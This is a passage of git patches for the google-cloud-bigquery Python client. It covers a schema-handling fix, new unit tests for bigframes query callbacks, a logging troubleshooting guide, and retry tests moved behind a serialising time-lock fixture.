+ if not location: + location = self._properties.get("location") + return location @property def query_id(self) -> Optional[str]: diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index a0986c44e..219b31467 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1837,7 +1837,7 @@ def __init__( page_start=_rows_page_start, next_token="pageToken", ) - schema = _to_schema_fields(schema) + schema = _to_schema_fields(schema) if schema else () self._field_to_index = _helpers._field_to_index_mapping(schema) self._page_size = page_size self._preserve_order = False @@ -2917,7 +2917,6 @@ class _EmptyRowIterator(RowIterator): statements. """ - schema = () pages = () total_rows = 0 diff --git a/tests/unit/test_client_bigframes.py b/tests/unit/test_client_bigframes.py new file mode 100644 index 000000000..0fcc31e40 --- /dev/null +++ b/tests/unit/test_client_bigframes.py @@ -0,0 +1,411 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +"""Tests for Client features enabling the bigframes integration.""" + +from __future__ import annotations + +import datetime +from unittest import mock + +import pytest + +import google.auth.credentials +from google.api_core import exceptions +from google.cloud import bigquery +import google.cloud.bigquery.client +from google.cloud.bigquery import _job_helpers + + +PROJECT = "test-project" +LOCATION = "test-location" + + +def make_response(body, *, status_code: int = 200): + response = mock.Mock() + type(response).status_code = mock.PropertyMock(return_value=status_code) + response.json.return_value = body + return response + + +@pytest.fixture +def client(): + """A real client object with mocked API requests.""" + credentials = mock.create_autospec( + google.auth.credentials.Credentials, instance=True + ) + http_session = mock.Mock() + return google.cloud.bigquery.client.Client( + project=PROJECT, + credentials=credentials, + _http=http_session, + location=LOCATION, + ) + + +def test_query_and_wait_bigframes_dry_run_no_callback(client): + client._http.request.side_effect = [ + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query + "location": LOCATION, + "queryId": "abcdefg", + "totalBytesProcessed": "123", + "jobComplete": True, + } + ), + ] + callback = mock.Mock() + job_config = bigquery.QueryJobConfig(dry_run=True) + response = client._query_and_wait_bigframes( + query="SELECT 1", job_config=job_config, callback=callback + ) + callback.assert_not_called() + assert response.total_bytes_processed == 123 + assert response.query_id == "abcdefg" + + +def test_query_and_wait_bigframes_callback(client): + created = datetime.datetime( + 2025, 8, 18, 10, 11, 12, 345000, tzinfo=datetime.timezone.utc + ) + started = datetime.datetime( + 2025, 8, 18, 10, 11, 13, 456000, tzinfo=datetime.timezone.utc + ) + ended = datetime.datetime( + 2025, 8, 18, 10, 11, 14, 567000, tzinfo=datetime.timezone.utc + ) + client._http.request.side_effect 
= [ + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query + "location": LOCATION, + "queryId": "abcdefg", + "totalRows": "100", + "totalBytesProcessed": "123", + "totalSlotMs": "987", + "jobComplete": True, + "creationTime": _to_millis(created), + "startTime": _to_millis(started), + "endTime": _to_millis(ended), + } + ), + ] + callback = mock.Mock() + client._query_and_wait_bigframes(query="SELECT 1", callback=callback) + callback.assert_has_calls( + [ + mock.call( + _job_helpers.QuerySentEvent( + query="SELECT 1", + billing_project=PROJECT, + location=LOCATION, + # No job ID, because a basic query is eligible for jobs.query. + job_id=None, + request_id=mock.ANY, + ) + ), + mock.call( + _job_helpers.QueryFinishedEvent( + billing_project=PROJECT, + location=LOCATION, + query_id="abcdefg", + total_rows=100, + total_bytes_processed=123, + slot_millis=987, + created=created, + started=started, + ended=ended, + # No job ID or destination, because a basic query is eligible for jobs.query. 
+ job_id=None, + destination=None, + ), + ), + ] + ) + + +def _to_millis(dt: datetime.datetime) -> str: + return str( + int( + (dt - datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)) + / datetime.timedelta(milliseconds=1) + ) + ) + + +def test_query_and_wait_bigframes_with_jobs_insert_callback_empty_results(client): + client._http.request.side_effect = [ + # jobs.insert because destination table present in job_config + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/insert + # https://cloud.google.com/bigquery/docs/reference/rest/v2/Job + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "statistics": { + "creationTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ) + ), + "query": { + "statementType": "SELECT", + # "queryPlan": [{"name": "part1"}, {"name": "part2"}], + }, + }, + "status": { + "state": "PENDING", + }, + } + ), + # jobs.get waiting for query to finish + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/insert + # https://cloud.google.com/bigquery/docs/reference/rest/v2/Job + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "status": { + "state": "PENDING", + }, + } + ), + # jobs.getQueryResults with max_results=0 + make_response( + { + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "jobComplete": True, + # totalRows is intentionally missing so we end up in the _EmptyRowIterator code path. 
+ } + ), + # jobs.get + make_response( + { + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "statistics": { + "creationTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ) + ), + "startTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 32, 123000, tzinfo=datetime.timezone.utc + ) + ), + "endTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 33, 123000, tzinfo=datetime.timezone.utc + ) + ), + "query": { + "statementType": "SELECT", + "totalBytesProcessed": 123, + "totalSlotMs": 987, + }, + }, + "status": {"state": "DONE"}, + } + ), + ] + callback = mock.Mock() + config = bigquery.QueryJobConfig() + config.destination = "proj.dset.table" + client._query_and_wait_bigframes( + query="SELECT 1", job_config=config, callback=callback + ) + callback.assert_has_calls( + [ + mock.call( + _job_helpers.QuerySentEvent( + query="SELECT 1", + billing_project="response-project", + location="response-location", + job_id="response-job-id", + # We use jobs.insert not jobs.query because destination is + # present on job_config. 
+ request_id=None, + ) + ), + mock.call( + _job_helpers.QueryReceivedEvent( + billing_project="response-project", + location="response-location", + job_id="response-job-id", + statement_type="SELECT", + state="PENDING", + query_plan=[], + created=datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ), + started=None, + ended=None, + ) + ), + mock.call( + _job_helpers.QueryFinishedEvent( + billing_project="response-project", + location="response-location", + job_id="response-job-id", + query_id=None, + total_rows=0, + total_bytes_processed=123, + slot_millis=987, + created=datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ), + started=datetime.datetime( + 2025, 8, 13, 13, 7, 32, 123000, tzinfo=datetime.timezone.utc + ), + ended=datetime.datetime( + 2025, 8, 13, 13, 7, 33, 123000, tzinfo=datetime.timezone.utc + ), + destination=None, + ), + ), + ] + ) + + +def test_query_and_wait_bigframes_with_jobs_insert_dry_run_no_callback(client): + client._http.request.side_effect = [ + # jobs.insert because destination table present in job_config + make_response( + { + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "statistics": { + "creationTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ) + ), + "query": { + "statementType": "SELECT", + "totalBytesProcessed": 123, + "schema": { + "fields": [ + {"name": "_f0", "type": "INTEGER"}, + ], + }, + }, + }, + "configuration": { + "dryRun": True, + }, + "status": {"state": "DONE"}, + } + ), + ] + callback = mock.Mock() + config = bigquery.QueryJobConfig() + config.destination = "proj.dset.table" + config.dry_run = True + result = client._query_and_wait_bigframes( + query="SELECT 1", job_config=config, callback=callback + ) + callback.assert_not_called() + assert result.total_bytes_processed == 123 + assert result.schema == 
[bigquery.SchemaField("_f0", "INTEGER")] + + +def test_query_and_wait_bigframes_with_query_retry_callbacks(client): + created = datetime.datetime( + 2025, 8, 18, 10, 11, 12, 345000, tzinfo=datetime.timezone.utc + ) + started = datetime.datetime( + 2025, 8, 18, 10, 11, 13, 456000, tzinfo=datetime.timezone.utc + ) + ended = datetime.datetime( + 2025, 8, 18, 10, 11, 14, 567000, tzinfo=datetime.timezone.utc + ) + client._http.request.side_effect = [ + exceptions.InternalServerError( + "first try", errors=({"reason": "jobInternalError"},) + ), + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query + "location": LOCATION, + "queryId": "abcdefg", + "totalRows": "100", + "totalBytesProcessed": "123", + "totalSlotMs": "987", + "jobComplete": True, + "creationTime": _to_millis(created), + "startTime": _to_millis(started), + "endTime": _to_millis(ended), + } + ), + ] + callback = mock.Mock() + client._query_and_wait_bigframes(query="SELECT 1", callback=callback) + callback.assert_has_calls( + [ + mock.call( + _job_helpers.QuerySentEvent( + query="SELECT 1", + billing_project=PROJECT, + location=LOCATION, + # No job ID, because a basic query is eligible for jobs.query. + job_id=None, + request_id=mock.ANY, + ) + ), + mock.call( + _job_helpers.QueryRetryEvent( + query="SELECT 1", + billing_project=PROJECT, + location=LOCATION, + # No job ID, because a basic query is eligible for jobs.query. + job_id=None, + request_id=mock.ANY, + ) + ), + mock.call( + _job_helpers.QueryFinishedEvent( + billing_project=PROJECT, + location=LOCATION, + query_id=mock.ANY, + total_rows=100, + total_bytes_processed=123, + slot_millis=987, + created=created, + started=started, + ended=ended, + # No job ID or destination, because a basic query is eligible for jobs.query. 
+ job_id=None, + destination=None, + ), + ), + ] + ) From b68483227693ea68f6b12eacca2be1803cffb1d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 18 Aug 2025 13:02:13 -0500 Subject: [PATCH 161/202] docs: add a TROUBLESHOOTING.md file with tips for logging (#2262) * docs: add a TROUBLESHOOTING.md file with tips for logging * typo * finish my sentence --------- Co-authored-by: Lingqing Gan --- TROUBLESHOOTING.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 TROUBLESHOOTING.md diff --git a/TROUBLESHOOTING.md b/TROUBLESHOOTING.md new file mode 100644 index 000000000..7da12c440 --- /dev/null +++ b/TROUBLESHOOTING.md @@ -0,0 +1,34 @@ +# Troubleshooting steps + +## Enable logging of BQ Storage Read API session creation + +It can be helpful to get the BQ Storage Read API session to allow the BigQuery +backend team to debug cases of API instability. The logs that share the session +creation are in a module-specific logger. To enable the logs, refer to the +following code sample: + +```python +import logging +import google.cloud.bigquery + +# Configure the basic logging to show DEBUG level messages +log_formatter = logging.Formatter( + '%(asctime)s - %(levelname)s - %(message)s' +) +handler = logging.StreamHandler() +handler.setFormatter(log_formatter) +default_logger = logging.getLogger() +default_logger.setLevel(logging.DEBUG) +default_logger.addHandler(handler) +to_dataframe_logger = logging.getLogger("google.cloud.bigquery._pandas_helpers") +to_dataframe_logger.setLevel(logging.DEBUG) +to_dataframe_logger.addHandler(handler) + +# Example code that touches the BQ Storage Read API. 
+bqclient = google.cloud.bigquery.Client() +results = bqclient.query_and_wait("SELECT * FROM `bigquery-public-data.usa_names.usa_1910_2013`") +print(results.to_dataframe().head()) +``` + +In particular, watch for the text "with BQ Storage API session" in the logs +to get the streaming API session ID to share with your support person. From d41fd5c7475d2cb7f7afc4cd5aaa080abfe831e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 20 Aug 2025 14:36:03 -0500 Subject: [PATCH 162/202] chore: execute retry tests serially, since they depend on global time (#2265) * chore: migrate test_base retry tests * migrate job_helpers test * migrate more tests * fix initiate resumable upload tests * fix failing tests * remove dead test code --- tests/unit/conftest.py | 13 + tests/unit/job/test_async_job_retry.py | 139 +++++ tests/unit/job/test_base.py | 104 ---- tests/unit/job/test_query.py | 196 ------ tests/unit/job/test_query_job_retry.py | 229 +++++++ tests/unit/test__job_helpers.py | 105 ---- tests/unit/test__job_helpers_retry.py | 122 ++++ tests/unit/test_client.py | 587 ------------------ tests/unit/test_client_bigframes.py | 2 +- .../test_client_resumable_media_upload.py | 433 +++++++++++++ tests/unit/test_client_retry.py | 279 +++++++++ tests/unit/test_job_retry.py | 18 +- 12 files changed, 1226 insertions(+), 1001 deletions(-) create mode 100644 tests/unit/job/test_async_job_retry.py create mode 100644 tests/unit/job/test_query_job_retry.py create mode 100644 tests/unit/test__job_helpers_retry.py create mode 100644 tests/unit/test_client_resumable_media_upload.py create mode 100644 tests/unit/test_client_retry.py diff --git a/tests/unit/conftest.py b/tests/unit/conftest.py index ebe2d2a7a..5070a199b 100644 --- a/tests/unit/conftest.py +++ b/tests/unit/conftest.py @@ -13,6 +13,7 @@ # limitations under the License. 
from unittest import mock +import threading import pytest @@ -24,6 +25,18 @@ def client(): yield make_client() +time_lock = threading.Lock() + + +@pytest.fixture +def global_time_lock(): + """Fixture to run tests serially that depend on the global time state, + such as tests of retry behavior. + """ + with time_lock: + yield + + @pytest.fixture def PROJECT(): yield "PROJECT" diff --git a/tests/unit/job/test_async_job_retry.py b/tests/unit/job/test_async_job_retry.py new file mode 100644 index 000000000..35041aa1b --- /dev/null +++ b/tests/unit/job/test_async_job_retry.py @@ -0,0 +1,139 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from unittest import mock + +import google.api_core.retry +from google.api_core import exceptions + +from . 
import helpers +import google.cloud.bigquery.job + + +PROJECT = "test-project" +JOB_ID = "test-job-id" + + +def test_cancel_w_custom_retry(global_time_lock): + from google.cloud.bigquery.retry import DEFAULT_RETRY + + api_path = "/projects/{}/jobs/{}/cancel".format(PROJECT, JOB_ID) + resource = { + "jobReference": { + "jobId": JOB_ID, + "projectId": PROJECT, + "location": None, + }, + "configuration": {"test": True}, + } + expected = resource.copy() + expected["statistics"] = {} + response = {"job": resource} + conn = helpers.make_connection( + ValueError, + response, + ) + client = helpers._make_client(project=PROJECT, connection=conn) + job = google.cloud.bigquery.job._AsyncJob( + google.cloud.bigquery.job._JobReference(JOB_ID, PROJECT, "EU"), client + ) + + retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + lambda exc: isinstance(exc, ValueError) + ) + + with mock.patch( + "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" + ) as final_attributes: + result = job.cancel(retry=retry, timeout=7.5) + + final_attributes.assert_called() + + assert result is True + assert job._properties == expected + conn.api_request.assert_has_calls( + [ + mock.call( + method="POST", + path=api_path, + query_params={"location": "EU"}, + timeout=7.5, + ), + mock.call( + method="POST", + path=api_path, + query_params={"location": "EU"}, + timeout=7.5, + ), # was retried once + ], + ) + + +def test_result_w_retry_wo_state(global_time_lock): + from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT + + begun_job_resource = helpers._make_job_resource( + job_id=JOB_ID, project_id=PROJECT, location="EU", started=True + ) + done_job_resource = helpers._make_job_resource( + job_id=JOB_ID, + project_id=PROJECT, + location="EU", + started=True, + ended=True, + ) + conn = helpers.make_connection( + exceptions.NotFound("not normally retriable"), + begun_job_resource, + exceptions.NotFound("not normally retriable"), + done_job_resource, + ) + client = 
helpers._make_client(project=PROJECT, connection=conn) + job = google.cloud.bigquery.job._AsyncJob( + google.cloud.bigquery.job._JobReference(JOB_ID, PROJECT, "EU"), client + ) + custom_predicate = mock.Mock() + custom_predicate.return_value = True + custom_retry = google.api_core.retry.Retry( + predicate=custom_predicate, + initial=0.001, + maximum=0.001, + deadline=0.1, + ) + assert job.result(retry=custom_retry) is job + + begin_call = mock.call( + method="POST", + path=f"/projects/{PROJECT}/jobs", + data={ + "jobReference": { + "jobId": JOB_ID, + "projectId": PROJECT, + "location": "EU", + } + }, + timeout=None, + ) + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={ + "projection": "full", + "location": "EU", + }, + timeout=DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + [begin_call, begin_call, reload_call, reload_call] + ) diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index aa3d49ce3..f5861f645 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -17,8 +17,6 @@ import unittest from unittest import mock -from google.api_core import exceptions -import google.api_core.retry from google.api_core.future import polling import pytest @@ -882,50 +880,6 @@ def test_cancel_explicit(self): ) self.assertEqual(job._properties, expected) - def test_cancel_w_custom_retry(self): - from google.cloud.bigquery.retry import DEFAULT_RETRY - - api_path = "/projects/{}/jobs/{}/cancel".format(self.PROJECT, self.JOB_ID) - resource = { - "jobReference": { - "jobId": self.JOB_ID, - "projectId": self.PROJECT, - "location": None, - }, - "configuration": {"test": True}, - } - expected = resource.copy() - expected["statistics"] = {} - response = {"job": resource} - job = self._set_properties_job() - - api_request_patcher = mock.patch.object( - job._client._connection, "api_request", side_effect=[ValueError, response] - ) - retry = 
DEFAULT_RETRY.with_deadline(1).with_predicate( - lambda exc: isinstance(exc, ValueError) - ) - - with api_request_patcher as fake_api_request: - with mock.patch( - "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" - ) as final_attributes: - result = job.cancel(retry=retry, timeout=7.5) - - final_attributes.assert_called() - - self.assertTrue(result) - self.assertEqual(job._properties, expected) - self.assertEqual( - fake_api_request.call_args_list, - [ - mock.call(method="POST", path=api_path, query_params={}, timeout=7.5), - mock.call( - method="POST", path=api_path, query_params={}, timeout=7.5 - ), # was retried once - ], - ) - def test__set_future_result_wo_done(self): client = _make_client(project=self.PROJECT) job = self._make_one(self.JOB_ID, client) @@ -1069,64 +1023,6 @@ def test_result_default_wo_state(self): ) conn.api_request.assert_has_calls([begin_call, begin_call, reload_call]) - def test_result_w_retry_wo_state(self): - from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT - - begun_job_resource = _make_job_resource( - job_id=self.JOB_ID, project_id=self.PROJECT, location="EU", started=True - ) - done_job_resource = _make_job_resource( - job_id=self.JOB_ID, - project_id=self.PROJECT, - location="EU", - started=True, - ended=True, - ) - conn = make_connection( - exceptions.NotFound("not normally retriable"), - begun_job_resource, - exceptions.NotFound("not normally retriable"), - done_job_resource, - ) - client = _make_client(project=self.PROJECT, connection=conn) - job = self._make_one( - self._job_reference(self.JOB_ID, self.PROJECT, "EU"), client - ) - custom_predicate = mock.Mock() - custom_predicate.return_value = True - custom_retry = google.api_core.retry.Retry( - predicate=custom_predicate, - initial=0.001, - maximum=0.001, - deadline=0.1, - ) - self.assertIs(job.result(retry=custom_retry), job) - - begin_call = mock.call( - method="POST", - path=f"/projects/{self.PROJECT}/jobs", - data={ - "jobReference": { - 
"jobId": self.JOB_ID, - "projectId": self.PROJECT, - "location": "EU", - } - }, - timeout=None, - ) - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={ - "projection": "full", - "location": "EU", - }, - timeout=DEFAULT_GET_JOB_TIMEOUT, - ) - conn.api_request.assert_has_calls( - [begin_call, begin_call, reload_call, reload_call] - ) - def test_result_explicit_w_state(self): conn = make_connection() client = _make_client(project=self.PROJECT, connection=conn) diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 8f684c3e9..ef6429598 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -20,15 +20,11 @@ import types from unittest import mock -import freezegun -from google.api_core import exceptions -import google.api_core.retry import requests from google.cloud.bigquery.client import _LIST_ROWS_FROM_QUERY_RESULTS_FIELDS import google.cloud.bigquery._job_helpers import google.cloud.bigquery.query -import google.cloud.bigquery.retry from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT from google.cloud.bigquery.table import _EmptyRowIterator @@ -1335,102 +1331,6 @@ def test_result_with_max_results(self): [jobs_get_call, query_page_waiting_call, query_page_2_call] ) - def test_result_w_custom_retry(self): - from google.cloud.bigquery.table import RowIterator - - query_resource = { - "jobComplete": False, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - } - query_resource_done = { - "jobComplete": True, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, - "totalRows": "2", - } - job_resource = self._make_resource(started=True, location="asia-northeast1") - job_resource_done = self._make_resource( - started=True, ended=True, location="asia-northeast1" - ) - job_resource_done["configuration"]["query"]["destinationTable"] = { - "projectId": 
"dest-project", - "datasetId": "dest_dataset", - "tableId": "dest_table", - } - - connection = make_connection( - # Also, for each API request, raise an exception that we know can - # be retried. Because of this, for each iteration we do: - # jobs.get (x2) & jobs.getQueryResults (x2) - exceptions.NotFound("not normally retriable"), - job_resource, - exceptions.NotFound("not normally retriable"), - query_resource, - # Query still not done, repeat both. - exceptions.NotFound("not normally retriable"), - job_resource, - exceptions.NotFound("not normally retriable"), - query_resource, - exceptions.NotFound("not normally retriable"), - # Query still not done, repeat both. - job_resource_done, - exceptions.NotFound("not normally retriable"), - query_resource_done, - # Query finished! - ) - client = _make_client(self.PROJECT, connection=connection) - job = self._get_target_class().from_api_repr(job_resource, client) - - custom_predicate = mock.Mock() - custom_predicate.return_value = True - custom_retry = google.api_core.retry.Retry( - initial=0.001, - maximum=0.001, - multiplier=1.0, - deadline=0.1, - predicate=custom_predicate, - ) - - self.assertIsInstance(job.result(retry=custom_retry), RowIterator) - query_results_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/queries/{self.JOB_ID}", - query_params={"maxResults": 0, "location": "asia-northeast1"}, - # TODO(tswast): Why do we end up setting timeout to - # google.cloud.bigquery.client._MIN_GET_QUERY_RESULTS_TIMEOUT in - # some cases but not others? - timeout=mock.ANY, - ) - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={"projection": "full", "location": "asia-northeast1"}, - timeout=DEFAULT_GET_JOB_TIMEOUT, - ) - - connection.api_request.assert_has_calls( - [ - # See make_connection() call above for explanation of the - # expected API calls. - # - # Query not done. 
- reload_call, - reload_call, - query_results_call, - query_results_call, - # Query still not done. - reload_call, - reload_call, - query_results_call, - query_results_call, - # Query done! - reload_call, - reload_call, - query_results_call, - query_results_call, - ] - ) - def test_result_w_empty_schema(self): from google.cloud.bigquery.table import _EmptyRowIterator @@ -1455,102 +1355,6 @@ def test_result_w_empty_schema(self): self.assertEqual(result.location, "asia-northeast1") self.assertEqual(result.query_id, "xyz-abc") - def test_result_w_timeout_doesnt_raise(self): - import google.cloud.bigquery.client - - begun_resource = self._make_resource() - query_resource = { - "jobComplete": True, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, - } - done_resource = copy.deepcopy(begun_resource) - done_resource["status"] = {"state": "DONE"} - connection = make_connection(begun_resource, query_resource, done_resource) - client = _make_client(project=self.PROJECT, connection=connection) - job = self._make_one(self.JOB_ID, self.QUERY, client) - job._properties["jobReference"]["location"] = "US" - job._properties["status"] = {"state": "RUNNING"} - - with freezegun.freeze_time("1970-01-01 00:00:00", tick=False): - job.result( - # Test that fractional seconds are supported, but use a timeout - # that is representable as a floating point without rounding - # errors since it can be represented exactly in base 2. In this - # case 1.125 is 9 / 8, which is a fraction with a power of 2 in - # the denominator. 
- timeout=1.125, - ) - - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={"projection": "full", "location": "US"}, - timeout=1.125, - ) - get_query_results_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/queries/{self.JOB_ID}", - query_params={ - "maxResults": 0, - "location": "US", - }, - timeout=google.cloud.bigquery.client._MIN_GET_QUERY_RESULTS_TIMEOUT, - ) - connection.api_request.assert_has_calls( - [ - reload_call, - get_query_results_call, - reload_call, - ] - ) - - def test_result_w_timeout_raises_concurrent_futures_timeout(self): - import google.cloud.bigquery.client - - begun_resource = self._make_resource() - begun_resource["jobReference"]["location"] = "US" - query_resource = { - "jobComplete": True, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, - } - done_resource = copy.deepcopy(begun_resource) - done_resource["status"] = {"state": "DONE"} - connection = make_connection(begun_resource, query_resource, done_resource) - client = _make_client(project=self.PROJECT, connection=connection) - job = self._make_one(self.JOB_ID, self.QUERY, client) - job._properties["jobReference"]["location"] = "US" - job._properties["status"] = {"state": "RUNNING"} - - with freezegun.freeze_time( - "1970-01-01 00:00:00", auto_tick_seconds=1.0 - ), self.assertRaises(concurrent.futures.TimeoutError): - job.result(timeout=1.125) - - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={"projection": "full", "location": "US"}, - timeout=1.125, - ) - get_query_results_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/queries/{self.JOB_ID}", - query_params={ - "maxResults": 0, - "location": "US", - }, - timeout=google.cloud.bigquery.client._MIN_GET_QUERY_RESULTS_TIMEOUT, - ) - connection.api_request.assert_has_calls( - [ - reload_call, - 
get_query_results_call, - # Timeout before we can reload with the final job state. - ] - ) - def test_result_w_page_size(self): # Arrange query_results_resource = { diff --git a/tests/unit/job/test_query_job_retry.py b/tests/unit/job/test_query_job_retry.py new file mode 100644 index 000000000..c8355b688 --- /dev/null +++ b/tests/unit/job/test_query_job_retry.py @@ -0,0 +1,229 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from unittest import mock + +import concurrent.futures +import freezegun +from google.api_core import exceptions +import google.api_core.retry +import pytest + +from google.cloud.bigquery.client import _MIN_GET_QUERY_RESULTS_TIMEOUT +from google.cloud.bigquery.job import QueryJob +from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT +from google.cloud.bigquery.table import RowIterator + +from ..helpers import make_connection +from .helpers import _make_client + + +PROJECT = "test-project" +JOB_ID = "test-job-id" +QUERY = "select count(*) from persons" + + +def _make_resource(started=False, ended=False, location="US"): + resource = { + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID, "location": location}, + "status": {"state": "PENDING"}, + "configuration": { + "query": {"query": QUERY}, + "job_type": "query", + }, + "statistics": {"creationTime": "1"}, + } + + if started: + resource["status"]["state"] = "RUNNING" + resource["statistics"]["startTime"] = "2" + + if ended: + 
resource["status"]["state"] = "DONE" + resource["statistics"]["endTime"] = "3" + + return resource + + +def test_result_w_custom_retry(global_time_lock): + query_resource = { + "jobComplete": False, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + } + query_resource_done = { + "jobComplete": True, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + "totalRows": "2", + } + job_resource = _make_resource(started=True, location="asia-northeast1") + job_resource_done = _make_resource( + started=True, ended=True, location="asia-northeast1" + ) + job_resource_done["configuration"]["query"]["destinationTable"] = { + "projectId": "dest-project", + "datasetId": "dest_dataset", + "tableId": "dest_table", + } + + connection = make_connection( + # Also, for each API request, raise an exception that we know can + # be retried. Because of this, for each iteration we do: + # jobs.get (x2) & jobs.getQueryResults (x2) + exceptions.NotFound("not normally retriable"), + job_resource, + exceptions.NotFound("not normally retriable"), + query_resource, + # Query still not done, repeat both. + exceptions.NotFound("not normally retriable"), + job_resource, + exceptions.NotFound("not normally retriable"), + query_resource, + exceptions.NotFound("not normally retriable"), + # Query still not done, repeat both. + job_resource_done, + exceptions.NotFound("not normally retriable"), + query_resource_done, + # Query finished! 
+ ) + client = _make_client(PROJECT, connection=connection) + job = QueryJob.from_api_repr(job_resource, client) + + custom_predicate = mock.Mock() + custom_predicate.return_value = True + custom_retry = google.api_core.retry.Retry( + initial=0.001, + maximum=0.001, + multiplier=1.0, + deadline=0.1, + predicate=custom_predicate, + ) + + assert isinstance(job.result(retry=custom_retry), RowIterator) + query_results_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/queries/{JOB_ID}", + query_params={"maxResults": 0, "location": "asia-northeast1"}, + timeout=mock.ANY, + ) + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={"projection": "full", "location": "asia-northeast1"}, + timeout=DEFAULT_GET_JOB_TIMEOUT, + ) + + connection.api_request.assert_has_calls( + [ + reload_call, + reload_call, + query_results_call, + query_results_call, + reload_call, + reload_call, + query_results_call, + query_results_call, + reload_call, + reload_call, + query_results_call, + query_results_call, + ] + ) + + +def test_result_w_timeout_doesnt_raise(global_time_lock): + begun_resource = _make_resource() + query_resource = { + "jobComplete": True, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + } + done_resource = begun_resource.copy() + done_resource["status"] = {"state": "DONE"} + connection = 